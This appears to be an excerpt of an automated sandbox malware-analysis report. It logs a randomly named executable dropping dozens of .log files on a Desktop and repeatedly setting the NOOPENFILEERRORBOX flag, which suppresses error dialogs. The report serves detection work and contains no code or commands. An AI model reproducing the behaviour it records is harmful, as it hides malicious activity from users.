                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\LqfKJGTv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\SmOJiIbE.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\uZZMHXbv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\lvRXXeLO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\dSJhnlvh.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\SeerDZBz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\KFhcUPbS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\ARClkDgk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\jKmGQQAV.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YWHQgFFn.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\GKfLNjlY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\wbMvdGfr.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\nyDFtNQJ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\eulplymD.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\rlBOrtmg.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\pafNrbGf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\hxXYHhry.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\XOEIXFmQ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\OkvSnMWj.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\FCcCDjRB.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\lkpWjeGm.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\VijSQbQY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\KpuBgggp.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\unoxMcqb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\rdSwMKLb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\IPEdAXAX.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\yYBvlMUk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\pqhfBjOC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\gMZpSqzV.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\PFIKyDTH.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\NvmJyloG.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\xtgFehys.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\mFCPuWEK.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\VxlkbjYv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\JEwTrooN.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\tCqOXkyz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\rsUNXSTy.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CvAVSmWD.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\NgGUXyfg.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\LWkTXfAf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\CnRDnDvx.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\lgAYTQQj.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\cCsjkXAC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\RONsALFU.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\AHwNgZaF.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\qZdxwwVX.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\YMBsdaAI.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\FvOMJVpt.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeFile created: C:\Users\user\Desktop\nimHpzUe.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
